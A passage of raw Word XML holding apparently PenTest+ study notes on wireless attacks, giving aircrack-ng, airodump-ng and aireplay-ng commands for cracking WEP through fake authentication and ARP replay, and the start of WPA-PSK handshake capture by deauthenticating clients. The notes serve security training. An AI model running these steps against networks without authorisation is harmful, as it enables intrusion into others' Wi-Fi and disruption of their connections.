          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>- -bssid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0635E7" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To set channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4EC2CC" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>- -channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4793EAD2" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To capture packets to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4448C" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E66290" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Aircrack-ng – Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095FEE88" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To crack password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E7E12" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>use aircrack or create hashcat file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4747E4" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>to specify a BSSID attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DB704" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082EF57" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To specify wordlist use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A24C31B" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5DCF3A" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To create a HCCAPX in order to use hashcat to crack the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE3DDE7" w14:textId="27604986" w:rsidR="00DE4665" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F16668" w14:textId="2E5B9007" w:rsidR="009933C7" w:rsidRDefault="009933C7" w:rsidP="009933C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Pentest+ Wireless Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B13A5B" w14:textId="35BC2E73" w:rsidR="009933C7" w:rsidRDefault="000E2C13" w:rsidP="009933C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cracking WEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4EC1CE" w14:textId="27A18938" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B19FF6F" w14:textId="24B5D9C1" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>airmon-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F94F5" w14:textId="6358A945" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enable monitor mode on wireless card</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B62AC28" w14:textId="4F759F0B" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>airmon-ng start &lt;interface name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E63454E" w14:textId="30B9B639" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ID channel WEP network is operating on using either</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9084B8" w14:textId="0EE0D37F" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>BSSID (MAC) or ESSID (network name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E5A5E" w14:textId="5FDD6F45" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>channel listed under CH column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D02907E" w14:textId="3EFBB37A" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>airodump-ng &lt;interface name&gt;mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59211827" w14:textId="0EAC042F" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exit out of air0dump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7829394A" w14:textId="7F8D7E6E" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>note channel, network name, MAC of AP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72384CBA" w14:textId="22801838" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Test wireless packet injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272DD24B" w14:textId="5CCEF2A5" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>aireplay-ng -9 -e &lt;network name&gt; -a &lt;target MAC&gt; &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F947D" w14:textId="01A218DB" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-9 means injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A03C0F" w14:textId="583AD092" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-e means wireless network name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636059A3" w14:textId="17A042CB" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-a means MAC of target AP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2F2189" w14:textId="152FEC78" w:rsidR="000E2C13" w:rsidRDefault="000E2C13" w:rsidP="000E2C13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>start airo</w:t>
      </w:r>
      <w:r w:rsidR="00F85420">
        <w:t>dump-ng -c 9 - -bssid &lt;target MAC&gt; -w wep-output &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F7DF3" w14:textId="25102A83" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>capture IVs from access point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B9D82" w14:textId="3871381E" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use aireplay-ng to initiate fake authentication request with the AP and associate with network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82AAF7" w14:textId="398BEE74" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>do this concurrently with previous step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48479F8C" w14:textId="1D444550" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>separate terminal window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F23D59E" w14:textId="7FB51AC2" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>aireplay-ng -1 0 -e &lt;network name&gt; -a &lt;target MAC&gt; -h &lt;wireless MAC&gt; &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D080DB" w14:textId="101F6219" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>start aireplay-ng in ARP request replay mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F03175A" w14:textId="0225C6D5" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>aireplay-ng -3 -b &lt;target MAC&gt; -h &lt;wireless MAC&gt; &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E498176" w14:textId="652F2F4D" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>let run for several minutes to capture sufficient packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E367AB5" w14:textId="4A06892C" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>roughly five minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C945CE" w14:textId="046137FC" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>after collecting roughly 5k IVs, kill airodump-ng and aireplay-ng commands with ctrl-c to write output to pcap file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD782B" w14:textId="50E9F0DE" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use aircrack-ng to crack WEP for target AP using IVs captured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CA4DBD" w14:textId="76BFA883" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use wildcard to specify all pcap files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B09976" w14:textId="6CED1567" w:rsidR="00F85420" w:rsidRDefault="00F85420" w:rsidP="00F85420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>aircrack-ng -b &lt;target MAC&gt; wep-output*.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5AFA71" w14:textId="7F3131E4" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cracking WPA-PSK and WPA2-PSK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D53E693" w14:textId="444C7AF2" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>start airodump-ng and try and collect an authentication handshake after a wireless client deauthenticates from the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45156B2F" w14:textId="0414AE4F" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>clients will appear under STATION column and will report BSSID of AP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286FC473" w14:textId="190DA142" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>airodump-ng -c 4 - -bssid &lt;target MAC&gt; -w &lt;outfile&gt; &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF014E7" w14:textId="7002254E" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wait for client to deauthenticate naturally and capture handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E0897" w14:textId="018B31F9" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can use aireplay-ng to deauthenticate an existing wireless client from network to capture handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408DAD3" w14:textId="3BF6BFBF" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
